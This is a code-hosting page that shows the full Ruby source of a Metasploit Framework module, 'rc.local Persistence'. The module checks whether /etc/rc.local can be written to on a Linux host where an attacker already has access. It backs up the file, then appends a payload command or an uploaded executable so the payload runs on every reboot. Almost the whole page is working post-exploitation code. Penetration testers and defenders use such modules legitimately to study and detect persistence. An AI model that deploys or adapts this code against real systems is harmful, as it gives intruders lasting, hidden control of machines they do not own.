Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/persistence/rc_local.rb
31811 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Unix

11
  include Msf::Exploit::EXE # for generate_payload_exe

12
  include Msf::Exploit::Local::Persistence

13
  include Msf::Auxiliary::Report

14
  prepend Msf::Exploit::Remote::AutoCheck

15
  include Msf::Exploit::Deprecated

16
  moved_from 'exploits/linux/local/rc_local_persistence'

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'rc.local Persistence',

23
        'Description' => %q{

24
          This module will edit /etc/rc.local in order to persist a payload.

25
          The payload will be executed on the next reboot.

26
          Verified on Ubuntu 18.04.3

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [ 'Eliott Teissonniere' ],

30
        'Platform' => [ 'unix', 'linux' ],

31
        'Arch' => [

32
          ARCH_CMD,

33
          ARCH_X86,

34
          ARCH_X64,

35
          ARCH_ARMLE,

36
          ARCH_AARCH64,

37
          ARCH_PPC,

38
          ARCH_MIPSLE,

39
          ARCH_MIPSBE

40
        ],

41
        'Payload' => {

42
          'BadChars' => '#%\n"'

43
        },

44
        'References' => [

45
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

46
          ['ATT&CK', Mitre::Attack::Technique::T1037_004_RC_SCRIPTS]

47
        ],

48
        'SessionTypes' => [ 'shell', 'meterpreter' ],

49
        'DisclosureDate' => '1980-10-01', # The rc command appeared in 4.0BSD.

50
        'Targets' => [ ['Automatic', {}] ],

51
        'Privileged' => true,

52
        'Notes' => {

53
          'Stability' => [CRASH_SAFE],

54
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

55
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

56
        },

57
        'DefaultTarget' => 0

58
      )

59
    )

60
    register_options([

61
      OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),

62
    ])

63
  end

64


65
  def check

66
    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')

67
    # a few notes for those who like to read source code. On Ubuntu 18.04.3, when no

68
    # /etc/rc.local file exists, systemctl status rc.local shows inactive (dead).

69
    # When /etc/rc.local exists, systemctl status rc.local shows active (exited).

70
    # so checking the service status isn't necessarily helpful.

71
    if exists?('/etc/rc.local')

72
      return CheckCode::Safe('/etc/rc.local isnt writable') unless writable?('/etc/rc.local')

73
    else

74
      return CheckCode::Safe('/etc/ isnt writable') unless writable?('/etc/')

75
    end

76


77
    CheckCode::Appears('/etc/rc.local is writable')

78
  end

79


80
  def install_persistence

81
    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')

82
    rc_path = '/etc/rc.local'

83


84
    print_status "Reading #{rc_path}"

85


86
    # read /etc/rc.local, but remove `exit 0`

87
    rc_local = '#!/bin/sh'

88
    if exists? rc_path

89
      rc_local = read_file(rc_path).gsub(/^exit.*$/, '')

90
      backup_profile_path = store_loot('rc.local', 'text/plain', session, rc_local, 'rc.local', '/etc/rc.local backup')

91
      print_status("Created /etc/rc.local backup: #{backup_profile_path}")

92
      @clean_up_rc << "upload #{backup_profile_path} #{rc_path}\n"

93
    else

94
      @clean_up_rc << "rm #{rc_path}\n"

95
    end

96


97
    if payload.arch.first == 'cmd'

98
      # add payload and put back `exit 0`

99
      pload = payload.encoded

100
      pload = "#{pload} &" unless pload.end_with?('&')

101
      rc_local << "\n#{pload}\nexit 0\n"

102
      print_status "Patching #{rc_path}"

103
    else

104
      payload_path = writable_dir

105
      payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"

106
      payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)

107
      payload_path << payload_name

108
      print_status("Uploading payload file to #{payload_path}")

109
      upload_and_chmodx payload_path, generate_payload_exe

110
      rc_local << "\n#{payload_path} &\nexit 0\n"

111
      @clean_up_rc << "rm #{payload_path}\n"

112
    end

113


114
    # write new file

115
    write_file(rc_path, rc_local)

116
    chmod(rc_path, 0o755)

117


118
    print_good('Payload will be triggered at next reboot')

119
  end

120
end

121


122